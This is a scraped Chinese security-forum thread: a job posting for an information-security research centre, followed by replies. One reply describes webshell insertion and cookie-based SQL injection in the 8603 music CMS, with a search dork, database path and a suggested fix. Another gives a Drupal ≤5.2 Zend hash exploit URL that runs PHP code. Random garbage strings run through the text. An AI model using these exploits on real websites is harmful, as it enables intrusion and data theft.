最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 浙江政安信息安全研究中心招贤纳士啦!

  • 招聘职位: 其他职位
  • 公司名称: 浙江政安信息安全研究中心
  • 工作地点: 浙江
  • 专业要求: 计算机专业 
  • 学历要求: 大专
  • 工作经验: 1年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.sitedirsec.com
  • 简历邮箱: 352113371@qq.com
  • 联系电话: 13000000000
  • 在线QQ: 352113371
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++浙江政安信息安全研究中心相关说明++++++++++

    浙江政安信息安全研究中心招贤纳士啦!
    ' g+ V# W3 _& U$ }3 }& i4 `* I简历投递:352113371@qq.com
    0 u  W* ~/ ^4 V! \* a
    ) V3 f& J/ B1 l0 `! I职位:售前工程师 2名 【7000-15000】
    9 o- W4 d- n. \* b7 i岗位职责:* q% V  M/ N5 K1 |; T/ n* a
    1、配合销售人员参与信息安全咨询服务及安全服务项目(包括渗透测试、漏洞扫描、APP安全测试、应急响应、安全加固、风险评估、安全规划、安全管理咨询等)的售前工作;
    / Q# l9 n4 P0 Q5 N2、配合销售人员准备与用户的技术交流、PPT等技术文件;  Z4 Q" i6 g* V9 @9 K7 ]
    3、负责信息安全咨询服务及安全服务的实施工作;
    " ?7 K0 b" k" L9 j# x8 W4、负责信息安全解决方案的售前,对信息安全解决方案项目进行售前技术支持,并协助销售人员跟进项目进度,配合项目的招投标工作(特别是技术方案的编写);
    ; _! Z+ j9 ]3 h, j- I: G5、负责信息安全咨询项目的现场调研、资料搜集、课题研究及用户答疑等工作;4 U' R( g8 F: I( a2 K# k8 j, y5 X1 c5 q
    任职要求:- ?) K3 K/ E4 [
    1、信息安全及计算机相关专业毕业,正规院校大学本科及以上学历。至少2年以上工作经验、有非常好的语言、文字组织能力;
      a0 ~0 n) \' w+ h7 [3 i# S2、有较广泛的IT基础知识,熟悉主流应用系统架构,对网络架构、加密认证类设备、网络安全产品深入了解;, N1 k: T' h% G0 J; W9 C
    3、熟悉企业IT规划的方法论和过程;' p" u; }, [0 z5 K! {' j4 d' x
    4、为客户提供过信息安全项目策划,具有丰富的信息安全项目策划和实施经验;
    % R+ k+ f, L& M& y! f: Q5、熟练掌握ISO27001等国际国内信息安全管理体系有关标准,掌握或从事过风险评估工作;$ Q: n: F) {8 C/ Y$ e9 u5 b
    6、具有良好的客户沟通能力及技巧;
    & ]# P# l# H  |( j7、能适应经常性短期出差;( i7 f- J# j1 M# N3 A
    8、具有CISSP、CISA、CISP、ISO27001LA、ITIL等相关资质者优先;
    / O5 z' e, e9 L" k$ n$ x
    % d: L" D" }. P3 }1 S9 R* B4 {" A职位:高级信息与网络安全工程师 3名 【5000-25000】
    $ l$ N- _- A* G2 [岗位职责:: ^3 ?  v. T: c. r8 q, A
        常驻政府单位或国有企业用户现场,根据用户需求提供现场信息与网络安全相关的支持服务,具体内容包括日常安全设备巡检、安全风险事件处理和应急响应、应用系统漏洞扫描和渗透测试、系统安全加固等工作。相关事件要求能形成规范的书面文字材料进行汇报。" f1 N' u  k# b, l: s& }& w
    任职条件:
    5 a" V8 w$ A* ~5 @7 v1、1-5年以上信息与网络安全相关工作经验。具有CCIE/CISP/CISSP等安全相关证书者优先;具有政府单位、大型企业单位驻场服务经历的优先;最终视工作年限和工作经验确定薪酬。' d' n+ f7 q' }/ f
    2、熟悉路由器、交换机、防火墙、入侵检测等常见网络安全产品;熟悉windows、linux等操作系统;熟悉常见数据库如Oracle、Sql server、My sql等;
    % ]( _! `; p/ I. Z3、对信息安全有兴趣和爱好,具有较强的学习能力。如无CISP证书的要求在入职以后3个月内取得证书。有渗透测试和应用开发经历与经验者优先;
    , }  Y, _2 i5 a4、有高度的责任心,能适应工作压力;具有较强的沟通协调能力,良好的口头表达和技术文档撰写能力。面试时要求提供3份以上本人撰写的安全相关技术文档和报告材料。* c' n5 M: o8 o! ^+ Z& L5 \, E- y
    ! C. B$ S$ B0 t# v3 @
    职位: 安全服务工程师 3名 【5000-15000】9 J+ U( x1 p7 ~
    任职要求:- V( `: M6 ~2 z$ }
    1. 能力突出者专业学历不限;
    # x6 q0 W6 r  y, ~, s; X) Z* S& R2. 对网络安全攻防有浓厚的兴趣并愿意为之倾注大量精力,有较强的工作责任心和主动学习能力;& A8 B- Y% K2 p1 x2 L8 \& K
    3. 熟练使用PHP、Python、Perl等任意一门编程语言;
    6 j# i9 g% M' @% z+ b4. 掌握MSSQL、MySQL、Oracle、SQLite等一种或几种主流数据库结构以及语法;' t1 t: s3 x3 E) x8 l  b
    5. 熟练使用各种安全扫描,渗透工具,有丰富的安全渗透经验并能能独立完成渗透测试;# [2 X. r- Y9 N8 t4 |: \: ?
    6. 熟悉常见Web漏洞产生的原理,熟悉Windows、Linux平台渗透测试、权限提升、后门分析、安全加固等。4 N4 I; B/ |" F  g  ^% o  L& ~
    优先考虑:8 t3 a7 O) l" o; ^7 t' u% @$ g
    1.有能够进行项目管理、售前工作者,对具体技术能力可以适当降低7 f$ a# H1 I, i4 d0 z9 O1 _2 j3 D
    2.熟悉iOS & Android APP 等移动安全测试; d1 t2 ?+ ]3 o. e4 {
    3.对智能设备、硬件安全测试有了解,熟悉相关常见协议' y' D9 n' @& q$ _* u( j( y' A
    4.有代码审计相关经验者,具备逆向分析能力更佳;" a" E" k) ]) g: C% b2 [9 o/ K
    5. 在漏乌云、洞盒子、补天等漏洞平台提交过相关有效漏洞;
    * ]9 z/ @! Q0 c) \; g6.具有其它可以秒杀面试官能力* o& K& e( D, B$ R( {
    7.具有CISSP、CISA、CISP、ISO27001LA、ITIL等相关资质者优先;

     

    您可能还想看的主题:

    安全宝招聘安全服务工程师

    关于信息安全等级保护

    600万用户遭泄密案告破 CSDN首吃信息安全罚单

    Windows 优化大师 Pro v7.99 木蚂蚁社区绿色专版

    合优网站管理系统存在SQL注射。。。原创首发~

    启明星辰招聘

    [HR]北京安码科技 信息安全工程师

    [HR]上海四域 信息安全工程师

    《信息安全架构》

    继续信息安全。

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:無情发表,本帖发表者無情符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者無情和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    8603音乐网管理系统v2009.1001漏洞
    8603音乐网管理系统 v2009.1001 数据库可插入一句话和Cookies注入

    2 f- i; A* n' g5 N  m+ R9 E
    数据库未作任何处理,可以插入一句话。继续插入经典一句话
    ! y) y8 W$ k7 W
    7 M) r2 l. u1 l/ U; w: u1 K
    Google: inurl:player.asp?classid 打开网页,点击 请你添加歌曲,在歌曲地址处插入一句话,提交,连接数据库即可。数据库地址:/data/%23datalink.asa
    7 M1 I) I; S* p
    二,classid处可以Cookies注入classid=request("classid")set rs1=server.createobject("adodb.recordset")rs1.open "select * from feilei where classid="&classid,conn,1,3classid=rs1("classid")
    # \* [; B9 V2 w  e/ |- M+ s+ J. J3 B
    这里多啰嗦几句。关于Cookies注入的问题。有人问寡人那几句代码为什么存在Cookies注入。这个其实寡人在 微尔网站管理系统V1.51的cookies注入 的文章里说过了。这里在啰嗦几下。如有错误,请不吝指正。

    & d- I( x8 Y, G4 N$ }
    变量都可以用request来直接取得的,并且是有先后顺序的,譬如你用这样的语句request("id")取得id变量,asp会先从Form过来的数据找变量,然后是QueryString部分,然后是Cookie部分。但是如果你指定了request.cookies("id")就只会从cookie里找变量内容,没有的话就为空,同理,如果用的是request.form("id")就会只从表单里取变量而不会理会其他提交方式中的内容。这三个取得变量的地方也是是我们经常提交数据的地方,并且都是很容易就能修改的,而player.asp他写的是直接request("classid"),并没有指明是那种方式,即使加了防注入,我们也可以突破防注入,用cookies注入,修补办法就是加上request的方法,把request("classid")改为request.queryString("classid"),
      Q& X* e2 L! W/ D9 e' }. I
    看看防注入页面,防注入页面只对 '----- 对 get query 值 的过滤.和 '-----对 post 表 单值的过滤.

    . D3 I+ a% o& d1 F1 I
    也就是过滤了request.QueryString和request.form的方法,而并没有过滤request.cookies的方法,cookies注

    : E+ ^5 @( U" g
    入也就产生了
    ! E1 s1 R+ j: z. ~4 {5 _
    用注入中转。
    - E( E2 x) K0 G  i
    + x& O4 d. @8 I1 X
    , \' c0 T" a) f0 N9 p* m1 X# K% W
    6 y- j" m* M, x' i

    ; O. S! H5 q' _, D
      e' k) j6 T# T. E2 P
    * M/ Y9 ~5 q, C
      Q! N+ Y+ U' i# y4 |8 N8 L' l- c9 P; k$ F* g

    , [2 C6 m5 n0 a+ Q  U' X3 y9 J
    8 |% @: F# `; @$ f4 @! h. w) L1 _* V2 S
    % q* X8 `" q/ l% ^0 N" x( N( K

    % h/ p- i# J7 V+ p  j* x2 W2 V
    " P' V* g( o' ]# h0 a1 C+ Q
    7 l" V7 f' u! b/ F- ^' |
    : t) u* }1 A! c$ g$ M3 H: t: @9 s! V/ n9 ?5 r, F0 }$ r  m
    & D  f, r! j4 |
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    发贴看看自己积分,呵呵,好像没有楼猪的多。
    2 |" a% }8 E/ w7 {! g; k
    * O4 a5 Q5 E5 V- z2 p# |9 e8 f
    9 |$ r( S5 J$ y$ F. f% z$ ^$ p( X
    : Y7 s& Q( ?6 R8 m1 N. c
    ) v7 w- o3 |  g  n' h3 }% W8 v
    $ R. T+ A5 [, \" L* j" \) X: o3 F9 u' r  U1 I9 m- h

    % ^* b% E' n* y* y+ l& N
    ( Q$ ?5 B+ t' }6 ^' B+ d
    , K) I% [  i6 a/ v6 h
    ! a! m+ v, V# s- I- x% k6 t
    ' B% ^2 K3 M# z1 t9 M$ r
    : b, z) p; _; t4 L" D4 X
    ) h( F% r0 E% L0 I6 l% s/ w
    0 k# h$ a; h; L( W+ s' X6 F) ?; I; K$ h& j- ~
    2 a, b  G$ _" [! z5 A. p7 P* K8 j( ~: ?
    - ]  O& J5 V4 v. g( m6 y  d' o
    % e# J0 p: ~3 z% I, G5 f+ a  B
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    php的zend哈希漏洞利用问题
    Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation VectorExample: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&amp;_menu[items][][type]=-1&amp;-312030023=1&amp;q=1/<?phpinfo();
    $ {& K2 X' o9 d3 H; n, y5 U& D: n3 n, ]  A  g
    / r: F9 g6 t5 Z( }

      }+ f) U/ G( P- W. W; a
    ! W, \1 T" i0 q1 C& ]$ p
    - O6 f% r( W- M2 u( u8 Z. L- q' F1 E/ I; P1 P# q5 M1 ?; g
    ( V% k1 [( D0 w' J# J7 G# f6 \8 C
    4 K6 [( L9 t% l) s

    : Y( f: }, t; k4 M6 E' M: {. e1 ]! ~5 }
    " G2 W" h* }; B

    0 M6 ]1 u" X( Z3 E: O2 }( E6 A, e" R$ |7 p# d5 F7 |' d

      R" H; F" Y, Q8 M. O6 i2 l9 {+ h& l0 u' S7 d
    " w7 @5 J+ f) [5 R- [
    ( `/ \) J, [+ J: _
    : g3 R* D* c9 p4 y5 h, X5 s5 F
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表